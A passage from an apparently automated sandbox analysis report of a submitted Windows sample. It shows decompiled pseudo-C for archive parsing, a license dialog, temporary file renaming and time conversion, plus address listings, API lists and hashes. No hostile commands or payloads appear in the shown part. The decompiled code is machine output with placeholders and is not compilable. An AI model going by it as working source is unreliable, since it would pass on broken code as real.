											if(__eflags > 0) {
												L60:
												E00A0C8E4(_t315);
												__eflags = E00A0C8E4(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00A03F8F(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00A10109(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00A0C8E4(_t315);
											 *(_t240 + 0x2104) = E00A0C8E4(_t315) & 0x00000001;
											_t331 = E00A0C8E4(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00A0C846(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00A0BF24(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00A11748();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00A0C8E4(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00A0C8E4(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00A0C846(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00A0C8E4(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00A0C846(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00A0C8E4(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00A0C8E4(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00A01FB9(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































                                                        0x00a020ec
                                                        0x00a020f2
                                                        0x00a020f9
                                                        0x00a020fd
                                                        0x00a02102
                                                        0x00a0210c
                                                        0x00a02763
                                                        0x00a0276a
                                                        0x00a0276a
                                                        0x00a02112
                                                        0x00a02114
                                                        0x00a0211a
                                                        0x00a02121
                                                        0x00a0212a
                                                        0x00a0212c
                                                        0x00a02131
                                                        0x00a02133
                                                        0x00a02135
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02148
                                                        0x00a0214b
                                                        0x00a0214d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02153
                                                        0x00a02155
                                                        0x00000000
                                                        0x00a02165
                                                        0x00a02165
                                                        0x00a0216a
                                                        0x00a0216e
                                                        0x00a02173
                                                        0x00a02176
                                                        0x00a02178
                                                        0x00a0217a
                                                        0x00a0217c
                                                        0x00a02180
                                                        0x00a02184
                                                        0x00000000
                                                        0x00a02194
                                                        0x00a02198
                                                        0x00a021a9
                                                        0x00a021ad
                                                        0x00a021b2
                                                        0x00a021b8
                                                        0x00a021bc
                                                        0x00a021c5
                                                        0x00a021dd
                                                        0x00a021df
                                                        0x00a021e2
                                                        0x00a021e2
                                                        0x00a021e5
                                                        0x00a021e5
                                                        0x00a021eb
                                                        0x00a021ef
                                                        0x00a021f8
                                                        0x00a02210
                                                        0x00a02212
                                                        0x00a02215
                                                        0x00a02215
                                                        0x00a021f8
                                                        0x00a02218
                                                        0x00a0221c
                                                        0x00a0221c
                                                        0x00a02224
                                                        0x00a02230
                                                        0x00a02232
                                                        0x00000000
                                                        0x00a02243
                                                        0x00a02243
                                                        0x00a02246
                                                        0x00a025f5
                                                        0x00a025fa
                                                        0x00a025fc
                                                        0x00a0262c
                                                        0x00a0263a
                                                        0x00a02642
                                                        0x00a0264d
                                                        0x00a02650
                                                        0x00a02656
                                                        0x00a02659
                                                        0x00a02668
                                                        0x00a0266d
                                                        0x00a02671
                                                        0x00a02675
                                                        0x00a0267d
                                                        0x00a0267d
                                                        0x00a0268d
                                                        0x00a0269d
                                                        0x00a026a2
                                                        0x00a026a9
                                                        0x00a026b1
                                                        0x00a026ba
                                                        0x00a026c8
                                                        0x00a026d2
                                                        0x00a026df
                                                        0x00a026e8
                                                        0x00a026ee
                                                        0x00a026ff
                                                        0x00a02704
                                                        0x00a02709
                                                        0x00a0270d
                                                        0x00a02711
                                                        0x00a02717
                                                        0x00a02721
                                                        0x00a02726
                                                        0x00a02729
                                                        0x00a0272b
                                                        0x00a0272d
                                                        0x00a0272d
                                                        0x00a0272b
                                                        0x00a02717
                                                        0x00a02733
                                                        0x00a0273a
                                                        0x00a02744
                                                        0x00a025fe
                                                        0x00a0260b
                                                        0x00a02610
                                                        0x00a02614
                                                        0x00a02618
                                                        0x00a02620
                                                        0x00a02620
                                                        0x00000000
                                                        0x00a025fc
                                                        0x00a0224c
                                                        0x00a0224f
                                                        0x00a025ce
                                                        0x00a025d3
                                                        0x00a025d5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a025db
                                                        0x00a025e3
                                                        0x00a025ed
                                                        0x00a022a4
                                                        0x00a022a6
                                                        0x00000000
                                                        0x00a022a6
                                                        0x00a02255
                                                        0x00a02258
                                                        0x00a0244f
                                                        0x00a02451
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02457
                                                        0x00a02462
                                                        0x00a02464
                                                        0x00a02469
                                                        0x00a0246d
                                                        0x00a0246f
                                                        0x00a02475
                                                        0x00a02479
                                                        0x00a02479
                                                        0x00a0247c
                                                        0x00a02480
                                                        0x00a02482
                                                        0x00a02484
                                                        0x00a02486
                                                        0x00a024aa
                                                        0x00a02488
                                                        0x00a02496
                                                        0x00a02496
                                                        0x00a024af
                                                        0x00a024b3
                                                        0x00a024b3
                                                        0x00a024b7
                                                        0x00a024b7
                                                        0x00a024ba
                                                        0x00a024be
                                                        0x00a024c0
                                                        0x00a024c2
                                                        0x00a024c4
                                                        0x00a024e8
                                                        0x00a024c6
                                                        0x00a024d4
                                                        0x00a024d4
                                                        0x00a024c4
                                                        0x00a024ed
                                                        0x00a024f3
                                                        0x00a024f3
                                                        0x00a024f6
                                                        0x00a024fa
                                                        0x00a024fc
                                                        0x00a02501
                                                        0x00a02503
                                                        0x00a02527
                                                        0x00a02505
                                                        0x00a02513
                                                        0x00a02513
                                                        0x00a0252c
                                                        0x00a0252c
                                                        0x00a02530
                                                        0x00a02535
                                                        0x00a0253b
                                                        0x00a0253d
                                                        0x00a02543
                                                        0x00a02548
                                                        0x00a02571
                                                        0x00a02576
                                                        0x00a0254a
                                                        0x00a0254c
                                                        0x00a02551
                                                        0x00a02556
                                                        0x00a0255b
                                                        0x00a0255d
                                                        0x00a0255f
                                                        0x00a0256a
                                                        0x00a0256a
                                                        0x00a0255f
                                                        0x00a0257b
                                                        0x00a02580
                                                        0x00a02589
                                                        0x00a0258b
                                                        0x00a0258d
                                                        0x00a02598
                                                        0x00a02598
                                                        0x00a0258d
                                                        0x00a0259d
                                                        0x00a025a2
                                                        0x00a025af
                                                        0x00a025b1
                                                        0x00a025b3
                                                        0x00a025c2
                                                        0x00a025c2
                                                        0x00a025b3
                                                        0x00a025a2
                                                        0x00a0253d
                                                        0x00000000
                                                        0x00a02535
                                                        0x00a02459
                                                        0x00a0245c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0245c
                                                        0x00a0225e
                                                        0x00a02261
                                                        0x00a023f2
                                                        0x00a023f4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a023fa
                                                        0x00a02405
                                                        0x00a02407
                                                        0x00a02413
                                                        0x00a02415
                                                        0x00a02425
                                                        0x00a0242f
                                                        0x00a02434
                                                        0x00a02445
                                                        0x00a02445
                                                        0x00000000
                                                        0x00a02415
                                                        0x00a023fc
                                                        0x00a023ff
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a023ff
                                                        0x00a02267
                                                        0x00a0226a
                                                        0x00a0237d
                                                        0x00a0238c
                                                        0x00a02397
                                                        0x00a02399
                                                        0x00a023a1
                                                        0x00a023a7
                                                        0x00a023b4
                                                        0x00a023b9
                                                        0x00a023b9
                                                        0x00a023cf
                                                        0x00a023d4
                                                        0x00a023df
                                                        0x00a023e7
                                                        0x00a023e8
                                                        0x00000000
                                                        0x00a023e8
                                                        0x00a02270
                                                        0x00a02273
                                                        0x00a022b2
                                                        0x00a022b9
                                                        0x00a022c0
                                                        0x00a022c9
                                                        0x00a022d7
                                                        0x00a022dd
                                                        0x00a022e4
                                                        0x00a022e8
                                                        0x00a022ea
                                                        0x00a022f3
                                                        0x00a022fa
                                                        0x00a022fc
                                                        0x00a022fe
                                                        0x00a022fe
                                                        0x00a02304
                                                        0x00a02309
                                                        0x00a0230d
                                                        0x00a0230d
                                                        0x00a02311
                                                        0x00a02313
                                                        0x00a0231c
                                                        0x00a02323
                                                        0x00a02325
                                                        0x00a02327
                                                        0x00a02327
                                                        0x00a0232a
                                                        0x00a02333
                                                        0x00a02338
                                                        0x00a02338
                                                        0x00a0233c
                                                        0x00a02343
                                                        0x00a0234c
                                                        0x00a0234c
                                                        0x00a02352
                                                        0x00a02359
                                                        0x00a02362
                                                        0x00a02362
                                                        0x00a02368
                                                        0x00000000
                                                        0x00a02368
                                                        0x00a02278
                                                        0x00000000
                                                        0x00000000
                                                        0x00a02282
                                                        0x00a02290
                                                        0x00a02290
                                                        0x00a02293
                                                        0x00a0229c
                                                        0x00a022a1
                                                        0x00a022a2
                                                        0x00000000
                                                        0x00a022a2
                                                        0x00a0274b
                                                        0x00a0274b
                                                        0x00a0274b
                                                        0x00a0274f
                                                        0x00a02755
                                                        0x00a0275a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0275a
                                                        0x00a02224
                                                        0x00a02184
                                                        0x00a02155
                                                        0x00a02762

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;%u$x%u$xc%u
                                                        • API String ID: 0-2277559157
                                                        • Opcode ID: d7cd6f8dabab9c5aeef6da9dfe9febb8edb52d25159d6fff0ba8ed0288edbcb9
                                                        • Instruction ID: 42687a3e3dd3359b8fc21feb81b5e649761b2628e492b90f9a72498473c3d053
                                                        • Opcode Fuzzy Hash: d7cd6f8dabab9c5aeef6da9dfe9febb8edb52d25159d6fff0ba8ed0288edbcb9
                                                        • Instruction Fuzzy Hash: D7F16631A043885BDB15EF24A999BFE7799AF94300F084679FC858F2C3DB64D948C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E00A1AF60(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00A0130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00A1CFEE(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xa4c574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xa56b7c;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xa5ec94;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xa620cc(0xf));
					 *0xa620c8(_t34);
					_t30 =  *0xa48444; // 0x0
					E00A19878(_t30, __eflags,  *0xa40ed4, _t37,  *0xa5ec90, 0, 0);
					L00A2389E( *0xa5ec94);
					L00A2389E( *0xa5ec90);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}














                                                        0x00a1af60
                                                        0x00a1af61
                                                        0x00a1af67
                                                        0x00a1af6e
                                                        0x00a1af87
                                                        0x00a1b073
                                                        0x00a1b075
                                                        0x00000000
                                                        0x00a1b075
                                                        0x00a1af8d
                                                        0x00a1af93
                                                        0x00a1afc0
                                                        0x00a1afc5
                                                        0x00a1afca
                                                        0x00a1afcc
                                                        0x00a1afd7
                                                        0x00a1afd7
                                                        0x00a1afdd
                                                        0x00a1afe2
                                                        0x00a1afe4
                                                        0x00a1aff0
                                                        0x00a1aff0
                                                        0x00a1aff6
                                                        0x00a1affb
                                                        0x00a1affd
                                                        0x00a1b001
                                                        0x00a1b001
                                                        0x00a1b016
                                                        0x00a1b01e
                                                        0x00a1b034
                                                        0x00a1b03b
                                                        0x00a1b041
                                                        0x00a1b056
                                                        0x00a1b061
                                                        0x00a1b06c
                                                        0x00000000
                                                        0x00a1b072
                                                        0x00a1af98
                                                        0x00a1afa7
                                                        0x00000000
                                                        0x00a1afa7
                                                        0x00a1af9d
                                                        0x00a1afa0
                                                        0x00a1afbb
                                                        0x00a1afaf
                                                        0x00a1afb0
                                                        0x00000000
                                                        0x00a1afb0
                                                        0x00a1afa5
                                                        0x00a1afae
                                                        0x00000000
                                                        0x00a1afae
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        • EndDialog.USER32(?,00000001), ref: 00A1AFB0
                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A1AFD7
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A1AFF0
                                                        • SetWindowTextW.USER32(?,?), ref: 00A1B001
                                                        • GetDlgItem.USER32(?,00000065), ref: 00A1B00A
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A1B01E
                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A1B034
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                        • String ID: LICENSEDLG
                                                        • API String ID: 3214253823-2177901306
                                                        • Opcode ID: 6f20d44b7321b6678de40b46b5a08d36aac2d0a099069bb1b42d91470a52ebd1
                                                        • Instruction ID: 7cb8438b4b7cc5ad9fcf43b2122c6e88803babb0366608d97e62cf23ace919f1
                                                        • Opcode Fuzzy Hash: 6f20d44b7321b6678de40b46b5a08d36aac2d0a099069bb1b42d91470a52ebd1
                                                        • Instruction Fuzzy Hash: 5B217172245205BBD2219FB5ED49FBB3B7DFB5BB42F010014F245E61A0CBA2A9439772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A095E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E00A095E0(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00A1E554(E00A32168, _t84);
				E00A1E630();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4038;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5038, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00A0BE89(_t91, _t84 - 0x4038);
							_t78 = E00A0BE89(_t91, _t84 - 0x5038);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00A11AC4( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00A11AC4(E00A0BE89(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00A10131(_t84 - 0x1010, _t82, 0x800);
											E00A03F8F(E00A0BE89(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00A0A373(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00A10131(_t84 - 0x3038, _t82, 0x800);
										_push(0x800);
										E00A0BEFF(_t98, _t84 - 0x3038,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3038, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00A097B6(_t84 - 0x2038);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E00A0A373(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E00A098BE(_t84 - 0x2038);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3038);
											if(_t68 != 0) {
												E00A09870(_t84 - 0x2038);
												E00A099B7(_t84 - 0x2038, _t82);
											}
											E00A097F0(_t84 - 0x2038, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

















                                                        0x00a095e5
                                                        0x00a095ef
                                                        0x00a095f6
                                                        0x00a095f9
                                                        0x00a09608
                                                        0x00a09610
                                                        0x00a097a1
                                                        0x00a097a1
                                                        0x00a097a1
                                                        0x00a0961e
                                                        0x00a09627
                                                        0x00a0962f
                                                        0x00000000
                                                        0x00a09635
                                                        0x00a09635
                                                        0x00a09637
                                                        0x00000000
                                                        0x00a0963d
                                                        0x00a09649
                                                        0x00a09658
                                                        0x00a0965a
                                                        0x00a0965f
                                                        0x00000000
                                                        0x00a09665
                                                        0x00a09669
                                                        0x00a0966e
                                                        0x00a09670
                                                        0x00000000
                                                        0x00a09676
                                                        0x00a0967e
                                                        0x00a09685
                                                        0x00000000
                                                        0x00a0968b
                                                        0x00a0968b
                                                        0x00a09692
                                                        0x00a09694
                                                        0x00a09694
                                                        0x00a09697
                                                        0x00000000
                                                        0x00000000
                                                        0x00a096a6
                                                        0x00a096c3
                                                        0x00a096c8
                                                        0x00a096d9
                                                        0x00a096e6
                                                        0x00a096db
                                                        0x00a096db
                                                        0x00a096dd
                                                        0x00a096dd
                                                        0x00a096ed
                                                        0x00a096f6
                                                        0x00000000
                                                        0x00a096f8
                                                        0x00a096f8
                                                        0x00a096fb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a096fb
                                                        0x00000000
                                                        0x00a096f6
                                                        0x00a0970f
                                                        0x00a09714
                                                        0x00a0971f
                                                        0x00a0973a
                                                        0x00000000
                                                        0x00a0973c
                                                        0x00a09742
                                                        0x00a09748
                                                        0x00a09752
                                                        0x00a09754
                                                        0x00a09756
                                                        0x00a09762
                                                        0x00a09762
                                                        0x00a09772
                                                        0x00a0977a
                                                        0x00a09782
                                                        0x00a0978d
                                                        0x00a0978d
                                                        0x00a09798
                                                        0x00a0979d
                                                        0x00a0979d
                                                        0x00a0973a
                                                        0x00a09685
                                                        0x00a09670
                                                        0x00a0965f
                                                        0x00a09637
                                                        0x00a0962f
                                                        0x00a097a3
                                                        0x00a097a9
                                                        0x00a097b3

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A095E5
                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A09608
                                                        • GetShortPathNameW.KERNEL32 ref: 00A09627
                                                          • Part of subcall function 00A11AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00A0B250,?,?,?,00A0B1FE,?,-00000002,?,00000000,?), ref: 00A11ADA
                                                        • _swprintf.LIBCMT ref: 00A096C3
                                                          • Part of subcall function 00A03F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A03FA2
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A09732
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A09772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                        • String ID: rtmp%d
                                                        • API String ID: 2111052971-3303766350
                                                        • Opcode ID: 90582794f277241c2812ddbe17c5f4a10fc15b5f29c05568a65d5291b706de70
                                                        • Instruction ID: 3dc498d044548dc9e21cc6a85cdeb000ff9d510e7769ba80c168ecdf16b79669
                                                        • Opcode Fuzzy Hash: 90582794f277241c2812ddbe17c5f4a10fc15b5f29c05568a65d5291b706de70
                                                        • Instruction Fuzzy Hash: BB413F7291025C6ADF20EFA0ED85AEF737CAF55380F1444E5B549A3083DA758B89CAA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10D5A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00A10D5A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00A1EBB0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00A0AEE5() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0xa3e084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E00A10EC7(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E00A1EC20( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}




















                                                        0x00a10d5a
                                                        0x00a10d61
                                                        0x00a10d72
                                                        0x00a10d76
                                                        0x00a10d84
                                                        0x00a10da2
                                                        0x00a10db3
                                                        0x00a10dc3
                                                        0x00a10dd3
                                                        0x00a10de5
                                                        0x00a10ded
                                                        0x00a10df3
                                                        0x00a10df9
                                                        0x00a10dfd
                                                        0x00a10dff
                                                        0x00a10d86
                                                        0x00a10d90
                                                        0x00a10d90
                                                        0x00a10e0d
                                                        0x00a10e13
                                                        0x00a10e1e
                                                        0x00a10e1f
                                                        0x00a10e24
                                                        0x00a10e29
                                                        0x00a10e2e
                                                        0x00a10e36
                                                        0x00a10e3e
                                                        0x00a10e46
                                                        0x00a10e4c
                                                        0x00a10e4e
                                                        0x00a10e51
                                                        0x00a10e54
                                                        0x00a10e59
                                                        0x00a10e5d
                                                        0x00a10e62
                                                        0x00a10e63
                                                        0x00a10e6a
                                                        0x00a10e6d
                                                        0x00a10e70
                                                        0x00a10e73
                                                        0x00a10e76
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
